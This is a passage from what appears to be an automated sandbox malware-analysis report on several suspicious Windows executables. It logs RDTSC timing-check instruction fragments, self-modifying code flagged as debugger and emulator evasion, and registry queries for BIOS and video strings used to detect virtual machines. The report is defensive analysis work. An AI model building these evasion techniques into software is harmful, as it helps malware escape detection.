Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F0C1C second address: 57F0C2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F0C2E second address: 57F0C6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3FE0C24E66h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 call 00007F3FE0C24E5Eh 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c mov ah, bl 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58706E5 second address: 58706F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58706F4 second address: 587070C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE0C24E64h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 587070C second address: 5870761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dl, 1Fh 0x0000000f push esi 0x00000010 pushfd 0x00000011 jmp 00007F3FE11BFDD7h 0x00000016 sbb ax, E5EEh 0x0000001b jmp 00007F3FE11BFDD9h 0x00000020 popfd 0x00000021 pop eax 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5870761 second address: 5870765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5870765 second address: 5870770 instructions: 0x00000000 rdtsc 0x00000002 mov ax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5870770 second address: 5870774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5860AAB second address: 5860ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 jmp 00007F3FE11BFDD2h 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3FE11BFDD7h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58608EB second address: 58608F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58608F1 second address: 58608F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58608F5 second address: 58608F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58608F9 second address: 586090F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3FE11BFDCBh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 586090F second address: 5860915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5860915 second address: 5860919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5860919 second address: 586091D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 586091D second address: 5860972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov si, dx 0x0000000f pushfd 0x00000010 jmp 00007F3FE11BFDD9h 0x00000015 sub al, FFFFFFB6h 0x00000018 jmp 00007F3FE11BFDD1h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 jmp 00007F3FE11BFDCEh 0x00000026 pop ebp 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a mov edi, esi 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58001B4 second address: 58001B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58001B8 second address: 58001E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, dx 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F3FE11BFDCAh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3FE11BFDD7h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58001E7 second address: 58001ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58001ED second address: 58001F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5860D4D second address: 5860D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5860D51 second address: 5860D60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5860D60 second address: 5860D8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3FE0C24E5Dh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5860D8F second address: 5860DCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c jmp 00007F3FE11BFDCEh 0x00000011 push 773A7729h 0x00000016 pushad 0x00000017 mov dh, ah 0x00000019 popad 0x0000001a xor dword ptr [esp], 773B772Bh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov cx, DCCDh 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 581056E second address: 5810572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5810572 second address: 5810576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5810576 second address: 581057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 581057C second address: 5810595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE11BFDD5h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5810595 second address: 58105B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3FE0C24E5Fh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58105B1 second address: 58105CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58105CE second address: 58105D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58105D4 second address: 58105D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58105D8 second address: 581061A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov dx, C2C6h 0x00000012 popad 0x00000013 push FFFFFFFEh 0x00000015 jmp 00007F3FE0C24E5Dh 0x0000001a call 00007F3FE0C24E59h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push edx 0x00000023 pop ecx 0x00000024 movsx ebx, si 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 581061A second address: 581062A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE11BFDCCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 581062A second address: 5810639 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, edx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5810639 second address: 5810662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3FE11BFDD4h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5810662 second address: 581069C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 5Eh 0x00000005 pushfd 0x00000006 jmp 00007F3FE0C24E5Ah 0x0000000b add cl, 00000058h 0x0000000e jmp 00007F3FE0C24E5Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F3FE0C24E64h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 581069C second address: 58106BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 79BA7564h 0x00000008 call 00007F3FE11BFDCDh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58106BF second address: 58106C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58106C3 second address: 58106C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58106C7 second address: 58106CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58106CD second address: 58106F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 08D7h 0x00000007 mov edx, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3FE11BFDD5h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58106F1 second address: 5810777 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 6FF00AC1h 0x0000000e pushad 0x0000000f mov edx, 689E2DC0h 0x00000014 pushfd 0x00000015 jmp 00007F3FE0C24E69h 0x0000001a adc si, CDC6h 0x0000001f jmp 00007F3FE0C24E61h 0x00000024 popfd 0x00000025 popad 0x00000026 xor dword ptr [esp], 18B6A4C1h 0x0000002d jmp 00007F3FE0C24E5Eh 0x00000032 mov eax, dword ptr fs:[00000000h] 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F3FE0C24E67h 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5810777 second address: 58107F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b jmp 00007F3FE11BFDCCh 0x00000010 jmp 00007F3FE11BFDD2h 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F3FE11BFDCBh 0x0000001c nop 0x0000001d jmp 00007F3FE11BFDD6h 0x00000022 sub esp, 1Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F3FE11BFDD7h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58107F4 second address: 5810844 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F3FE0C24E5Eh 0x0000000f push eax 0x00000010 jmp 00007F3FE0C24E5Bh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F3FE0C24E65h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5810844 second address: 581084A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 581084A second address: 581084E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 581084E second address: 581087F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3FE11BFDD5h 0x00000013 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Special instruction interceptor: First address: EDEC3A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Special instruction interceptor: First address: EDECFF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Special instruction interceptor: First address: EDC2FA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Special instruction interceptor: First address: 1084A21 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Special instruction interceptor: First address: 1101CFC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: E4EC3A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: E4ECFF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: E4C2FA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: FF4A21 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 1071CFC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Special instruction interceptor: First address: 9ECB2C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Special instruction interceptor: First address: 81C9A9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Special instruction interceptor: First address: 81CA60 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Special instruction interceptor: First address: A5A77D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Special instruction interceptor: First address: D319E1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Special instruction interceptor: First address: D3199D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Special instruction interceptor: First address: EDBA6F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Special instruction interceptor: First address: F6BF14 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Special instruction interceptor: First address: DEDDBA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Special instruction interceptor: First address: DEDC9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Special instruction interceptor: First address: F95589 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Special instruction interceptor: First address: FA5C66 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Special instruction interceptor: First address: 1022ECA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Special instruction interceptor: First address: 2DEB85 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Special instruction interceptor: First address: 2DEAA7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Special instruction interceptor: First address: 49959B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Special instruction interceptor: First address: 497FE4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Special instruction interceptor: First address: 497CC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Special instruction interceptor: First address: 52B7A4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Special instruction interceptor: First address: CDFD18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Special instruction interceptor: First address: EAEC34 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Special instruction interceptor: First address: E8FAA1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Special instruction interceptor: First address: F19744 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Special instruction interceptor: First address: 46EC3A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Special instruction interceptor: First address: 46ECFF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Special instruction interceptor: First address: 46C2FA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Special instruction interceptor: First address: 614A21 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Special instruction interceptor: First address: 691CFC instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Memory allocated: 5500000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Memory allocated: 5750000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Memory allocated: 5580000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Memory allocated: 2C30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Memory allocated: 2F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Memory allocated: 4F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Memory allocated: 2290000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Memory allocated: 2460000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Memory allocated: 22C0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE

Code function: 11_2_05860CD0 rdtsc

11_2_05860CD0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5863	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3183	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6283	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1658
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 692
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 702
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 4485
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window / User API: threadDelayed 959
